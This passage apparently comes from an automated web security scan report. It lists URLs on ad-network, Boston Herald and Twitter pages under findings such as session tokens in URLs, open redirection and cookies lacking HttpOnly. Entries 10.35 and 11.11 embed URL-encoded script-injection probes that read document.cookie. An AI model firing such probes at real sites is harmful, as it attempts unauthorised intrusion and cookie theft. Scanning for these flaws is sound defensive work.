6.42. http://www.bostonherald.com/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also

6.43. http://www.bostonherald.com/track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also

6.44. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also

6.45. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also

6.46. http://www.bostonherald.com/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3

6.47. http://www.bostonherald.com/users/register

6.48. http://www.bostonherald.com/users/register/

6.49. http://www.paperg.com/

6.50. http://www.parker-software.com/forum/

6.51. http://www.parkersoft.co.uk/client.aspx

6.52. http://www.screenthumbs.com/

6.53. http://www.screenthumbs.com/about

6.54. http://www.screenthumbs.com/contact

6.55. http://www.screenthumbs.com/forgot

6.56. http://www.screenthumbs.com/linkthumbs

6.57. http://www.screenthumbs.com/plugins

6.58. http://www.screenthumbs.com/service

6.59. http://www.screenthumbs.com/signup

6.60. http://www.screenthumbs.com/signup.php

6.61. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

7. Session token in URL

7.1. http://base.liveperson.net/hc/5296924/

7.2. https://base.liveperson.net/hc/5296924/

7.3. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202419556/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

7.4. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1258292573/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c

7.5. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1443540246/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c

7.6. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1663408298/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

7.7. http://raw.oggifinogi.com/Track.aspx

7.8. http://www.bostonherald.com/entertainment/movies/

7.9. http://www.quantcast.com/p-352ZWwG8I7OVQ

8. Password field submitted using GET method

9. Open redirection

9.1. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [REST URL parameter 3]

9.2. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 3]

9.3. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [REST URL parameter 3]

10. Cookie scoped to parent domain

10.1. http://www.nydailynews.com/blogs/jets/2011/01/live-chat-friday-noon-1

10.2. http://www.nydailynews.com/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm

10.3. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

10.4. http://a.tribalfusion.com/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/

10.5. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/

10.6. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r

10.7. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

10.8. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/

10.9. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

10.10. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

10.11. http://a.tribalfusion.com/h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/

10.12. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

10.13. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/

10.14. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r

10.15. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/

10.16. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r

10.17. http://a.tribalfusion.com/i.cid

10.18. http://a.tribalfusion.com/j.ad

10.19. http://ad.afy11.net/ad

10.20. http://ad.doubleclick.net/click

10.21. http://ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

10.22. http://ad.doubleclick.net/jump/N6103.135388.BIZO/B5185769.6

10.23. http://ad.turn.com/server/ads.js

10.24. http://ad.turn.com/server/pixel.htm

10.25. http://amch.questionmarket.com/adsc/d791689/21/39823749/decide.php

10.26. http://ar.voicefive.com/b/wc_beacon.pli

10.27. http://ar.voicefive.com/bmx3/broker.pli

10.28. http://ar.voicefive.com/bmx3/broker.pli

10.29. http://ar.voicefive.com/bmx3/broker.pli

10.30. http://au.track.decideinteractive.com/n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c

10.31. http://b.scorecardresearch.com/b

10.32. http://b.scorecardresearch.com/r

10.33. http://base.liveperson.net/hc/5296924/

10.34. https://base.liveperson.net/hc/5296924/

10.35. https://base.liveperson.net/hc/5296924/5296924bff27%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e8465f0f4edd/

10.36. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

10.37. http://bs.serving-sys.com/BurstingPipe/adServer.bs

10.38. http://c.chango.com/collector/tag.js

10.39. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js

10.40. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js

10.41. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js

10.42. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js

10.43. http://cbs6albany.oodle.com/

10.44. http://cbs6albany.oodle.com/pro/fb-follow/

10.45. http://d7.zedo.com/OzoDB/cutils/R52_9/jsc/1302/egc.js

10.46. http://d7.zedo.com/OzoDB/cutils/R52_9/jsc/951/egc.js

10.47. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

10.48. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

10.49. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js

10.50. http://d7.zedo.com/bar/v16-401/d3/jsc/gl.js

10.51. http://d7.zedo.com/img/bh.gif

10.52. http://d7.zedo.com/utils/ecSet.js

10.53. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/

10.54. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/vj

10.55. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/

10.56. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/vj

10.57. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/

10.58. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/vj

10.59. http://ib.adnxs.com/ab

10.60. http://ib.adnxs.com/click/K01KQbd3DUBJwvOPFK4KQAAAAGBmZgJAScLzjxSuCkArTUpBt3cNQAIa1VB5i6osBWHfHSmrEEJFz0JNAAAAADgQAQDLAQAANQEAAAIAAACGaAIAhWQAAAEAAABVU0QAVVNEANgCWgD2DLoDvgQBAgUCAAIAAAAAox0IPAAAAAA./cnd=!txXYTwjsLBCG0QkYACCFyQEougcxnEjEH7d3DUBCEwgAEAAYACABKP7__________wFIAFAAWPYZYABotQI./referrer=http:/www.nydailynews.com/blogs70f75/clickenc=http:/www.clickability.com/campaigns/Express_Datasheet.html

10.61. http://ib.adnxs.com/getuid

10.62. http://ib.adnxs.com/getuidnb

10.63. http://ib.adnxs.com/getuidu

10.64. http://ib.adnxs.com/mapuid

10.65. http://ib.adnxs.com/ptj

10.66. http://ib.adnxs.com/ptj

10.67. http://ib.adnxs.com/ptj

10.68. http://ib.adnxs.com/ptj

10.69. http://ib.adnxs.com/ptj

10.70. http://ib.adnxs.com/ptj

10.71. http://ib.adnxs.com/ptj

10.72. http://ib.adnxs.com/ptj

10.73. http://ib.adnxs.com/ptj

10.74. http://ib.adnxs.com/ptj

10.75. http://ib.adnxs.com/ptj

10.76. http://ib.adnxs.com/ptj

10.77. http://ib.adnxs.com/ptj

10.78. http://ib.adnxs.com/ptj

10.79. http://ib.adnxs.com/ptj

10.80. http://ib.adnxs.com/ptj

10.81. http://ib.adnxs.com/ptj

10.82. http://ib.adnxs.com/ptj

10.83. http://ib.adnxs.com/ptj

10.84. http://ib.adnxs.com/ptj

10.85. http://ib.adnxs.com/ptj

10.86. http://ib.adnxs.com/ptj

10.87. http://ib.adnxs.com/ptj

10.88. http://ib.adnxs.com/ptj

10.89. http://ib.adnxs.com/ptj

10.90. http://ib.adnxs.com/ptj

10.91. http://ib.adnxs.com/ptj

10.92. http://ib.adnxs.com/ptj

10.93. http://ib.adnxs.com/ptj

10.94. http://ib.adnxs.com/ptj

10.95. http://ib.adnxs.com/ttj

10.96. http://media.fastclick.net/w/click.here

10.97. http://media.fastclick.net/w/get.media

10.98. http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it

10.99. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1/

10.100. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1065387053@Top1

10.101. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1

10.102. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1089179764@Top1

10.103. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1

10.104. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1105447520@Top1

10.105. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1452948432@Top1

10.106. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1486965027@Top1

10.107. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1498309992@Top1

10.108. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1718093063@Top1

10.109. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1728982362@Top1

10.110. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1847523344@Top1

10.111. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1932249236@Top1

10.112. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1964557901@Top1

10.113. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1969188118@Top1

10.114. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3

10.115. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3

10.116. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3

10.117. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3

10.118. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3

10.119. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3

10.120. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3

10.121. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3

10.122. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3

10.123. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3

10.124. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3

10.125. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle

10.126. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top

10.127. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@x01!x01

10.128. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

10.129. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

10.130. http://syndication.mmismm.com/mmtnt.php

10.131. http://tag.contextweb.com/TAGPUBLISH/getad.aspx

10.132. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/

10.133. http://tap.rubiconproject.com/oz/sensor

10.134. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js

10.135. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/click.txt

10.136. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl

10.137. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt

10.138. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl

10.139. http://voken.eyereturn.com/

10.140. http://voken.eyereturn.com/

10.141. http://voken.eyereturn.com/pb/get

10.142. http://voken.eyereturn.com/pix

10.143. http://xads.zedo.com/ads2/c

11. Cookie without HttpOnly flag set

11.1. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7

11.2. http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7

11.3. http://ads.adxpose.com/ads/ads.js

11.4. http://ads.adxpose.com/ads/tag.js

11.5. http://ads2.adbrite.com/favicon.ico

11.6. http://base.liveperson.net/visitor/addons/deploy.asp

11.7. http://base.liveperson.net/visitor/addons/deploy.asp

11.8. http://boston30.autochooser.com/results.asp

11.9. http://event.adxpose.com/event.flow

11.10. http://imlive.com/homepagems3.asp

11.11. http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f

11.12. http://local.nissanusa.com/zip.aspx

11.13. http://support.moxiesoft.com/

11.14. http://twitter.com/

11.15. http://twitter.com/247realmedia

11.16. http://twitter.com/AddThis

11.17. http://twitter.com/Applebees

11.18. http://twitter.com/AshieApple

11.19. http://twitter.com/Beckett_News

11.20. http://twitter.com/BosHerald_Edge/

11.21. http://twitter.com/ChrisLambton13

11.22. http://twitter.com/ConanOBrien

11.23. http://twitter.com/DustinPedroia15

11.24. http://twitter.com/ExpertDan

11.25. http://twitter.com/GQMagazine

11.26. http://twitter.com/Gr8BosFoodBank

11.27. http://twitter.com/Harvard

11.28. http://twitter.com/Jarvis_Green

11.29. http://twitter.com/JennyMcCarthy

11.30. http://twitter.com/John_W_Henry

11.31. http://twitter.com/KaseyRKahl

11.32. http://twitter.com/KhloeKardashian

11.33. http://twitter.com/KimKardashian

11.34. http://twitter.com/Late_Show

11.35. http://twitter.com/LibertyHotel

11.36. http://twitter.com/Michael_Joseph

11.37. http://twitter.com/Michael_Joseph/status/30390775099424770

11.38. http://twitter.com/Michael_Joseph/status/30750905452204032

11.39. http://twitter.com/Michael_Joseph/status/30790097846673409

11.40. http://twitter.com/MittRomney

11.41. http://twitter.com/NewYorkPost

11.42. http://twitter.com/Nicole_114

11.43. http://twitter.com/Oprah

11.44. http://twitter.com/PageLines

11.45. http://twitter.com/PageLines/status/27898822361354240

11.46. http://twitter.com/PhantomGourmet

11.47. http://twitter.com/Prucenter

11.48. http://twitter.com/PureADK

11.49. http://twitter.com/ROBERTPLANT

11.50. http://twitter.com/RealLamarOdom

11.51. http://twitter.com/RobertDuffy

11.52. http://twitter.com/ScampoLiberty

11.53. http://twitter.com/Script_Junkie

11.54. http://twitter.com/Sean_P_Doyle

11.55. http://twitter.com/Servigistics

11.56. http://twitter.com/ShaunieONeal

11.57. http://twitter.com/Simply_b06

11.58. http://twitter.com/Simply_b06/status/29173383425949696

11.59. http://twitter.com/Siobhan_Magnus

11.60. http://twitter.com/SlexAxton

11.61. http://twitter.com/StarWrit

11.62. http://twitter.com/Support

11.63. http://twitter.com/Svantasukhai

11.64. http://twitter.com/THE_REAL_SHAQ

11.65. http://twitter.com/TV38Boston

11.66. http://twitter.com/TechCrunch

11.67. http://twitter.com/TheKateBosworth

11.68. http://twitter.com/Trackgals

11.69. http://twitter.com/Trackgals/

11.70. http://twitter.com/_juliannemoore

11.71. http://twitter.com/about

11.72. http://twitter.com/about/contact

11.73. http://twitter.com/about/resources

11.74. http://twitter.com/account/complete

11.75. http://twitter.com/account/profile_image/malsup

11.76. http://twitter.com/account/resend_password

11.77. http://twitter.com/ajpiano

11.78. http://twitter.com/androidnewsblog

11.79. http://twitter.com/backstreetboys

11.80. http://twitter.com/benmezrich

11.81. http://twitter.com/bennadel

11.82. http://twitter.com/bostonherald

11.83. http://twitter.com/business

11.84. http://twitter.com/cjronson

11.85. http://twitter.com/cowboy

11.86. http://twitter.com/creationix

11.87. http://twitter.com/dandenney

11.88. http://twitter.com/danwrong

11.89. http://twitter.com/davevogler

11.90. http://twitter.com/deionbranch84

11.91. http://twitter.com/dougneiner

11.92. http://twitter.com/ebello

11.93. http://twitter.com/ericmmartin

11.94. http://twitter.com/ericmmartin/status/30128016856195073

11.95. http://twitter.com/favorites/14594657.rss

11.96. http://twitter.com/favorites/toptweets.json

11.97. http://twitter.com/gercheq

11.98. http://twitter.com/greenRAYn20

11.99. http://twitter.com/harvardlampoon

11.100. http://twitter.com/j_hollender

11.101. http://twitter.com/j_hollender/status/28168027493105664

11.102. http://twitter.com/j_hollender/status/28175738595180544

11.103. http://twitter.com/j_hollender/status/28205461161377793

11.104. http://twitter.com/jayleno

11.105. http://twitter.com/jbchang

11.106. http://twitter.com/jobs

11.107. http://twitter.com/joedwinell/

11.108. http://twitter.com/joemccann

11.109. http://twitter.com/jordanknight

11.110. http://twitter.com/kennychesney

11.111. http://twitter.com/kfaulk33

11.112. http://twitter.com/lapubell

11.113. http://twitter.com/lapubell/status/28131682842312704

11.114. http://twitter.com/lindapizzuti

11.115. http://twitter.com/login

11.116. http://twitter.com/malsup

11.117. http://twitter.com/malsup/favorites

11.118. http://twitter.com/malsup/followers

11.119. http://twitter.com/malsup/following

11.120. http://twitter.com/malsup/lists/memberships

11.121. http://twitter.com/malsup/status/28104072506638336

11.122. http://twitter.com/malsup/status/28148269980852225

11.123. http://twitter.com/malsup/status/28172705220009984

11.124. http://twitter.com/malsup/status/28172927228706816

11.125. http://twitter.com/malsup/status/28176483855896578

11.126. http://twitter.com/malsup/status/28206363616215040

11.127. http://twitter.com/malsup/status/28450557672824832

11.128. http://twitter.com/malsup/status/28451243869339648

11.129. http://twitter.com/malsup/status/29343613573926913

11.130. http://twitter.com/malsup/status/29343882311372800

11.131. http://twitter.com/malsup/status/29510556067041280

11.132. http://twitter.com/malsup/status/29705355999055872

11.133. http://twitter.com/malsup/status/30065585396121601

11.134. http://twitter.com/malsup/status/30103594925555712

11.135. http://twitter.com/malsup/status/30232367046074369

11.136. http://twitter.com/malsup/status/30417132269346816

11.137. http://twitter.com/malsup/status/30418291201679360

11.138. http://twitter.com/malsup/status/30442842241376256

11.139. http://twitter.com/malsup/status/30772839023910912

11.140. http://twitter.com/malsup/status/30791740717801472

11.141. http://twitter.com/mariamenounos

11.142. http://twitter.com/mattbanks

11.143. http://twitter.com/mattbanks/status/28168049634844672

11.144. http://twitter.com/mennovanslooten

11.145. http://twitter.com/messengerpost

11.146. http://twitter.com/miketaylr

11.147. http://twitter.com/miketaylr/status/28450462860574722

11.148. http://twitter.com/moxiesoft

11.149. http://twitter.com/onlyjazz

11.150. http://twitter.com/onlyjazz/status/29924505002446849

11.151. http://twitter.com/oschina

11.152. http://twitter.com/oschina/status/28102821484171264

11.153. http://twitter.com/oschina/status/30099933486915584

11.154. http://twitter.com/privacy

11.155. http://twitter.com/profile/not_logged_in/malsup

11.156. http://twitter.com/rachbarnhart

11.157. http://twitter.com/rem

11.158. http://twitter.com/rickrussie

11.159. http://twitter.com/rickrussie/status/28548182396903424

11.160. http://twitter.com/roctimo

11.161. http://twitter.com/roctimo/status/29669358812790784

11.162. http://twitter.com/rwaldron

11.163. http://twitter.com/ryanolson

11.164. http://twitter.com/scott_gonzalez

11.165. http://twitter.com/search

11.166. http://twitter.com/sentience

11.167. http://twitter.com/sessions/destroy

11.168. http://twitter.com/share

11.169. http://twitter.com/signup

11.170. http://twitter.com/simplemodal

11.171. http://twitter.com/sitepointdotcom

11.172. http://twitter.com/slaterusa

11.173. http://twitter.com/slaterusa/status/28450023532396544

11.174. http://twitter.com/statuses/user_timeline/14594657.rss

11.175. http://twitter.com/stubbornella

11.176. http://twitter.com/thehomeorg

11.177. http://twitter.com/tos

11.178. http://twitter.com/townsandtrails

11.179. http://twitter.com/travis

11.180. http://twitter.com/tylerseguin92

11.181. http://twitter.com/waynecountylife

11.182. http://twitter.com/webandy

11.183. http://twitter.com/webandy/status/30434889127960577

11.184. http://twitter.com/widgets

11.185. http://twitter.com/zonajones

11.186. http://www.berkshireeagle.com/

11.187. http://www.collegeanduniversity.net/herald/

11.188. http://www.dominionenterprises.com/main/do/Privacy_Policy

11.189. http://www.dominionenterprises.com/main/do/Terms_of_Use

11.190. http://www.paperg.com/jsfb/embed.php

11.191. http://www.parker-software.com/forum/

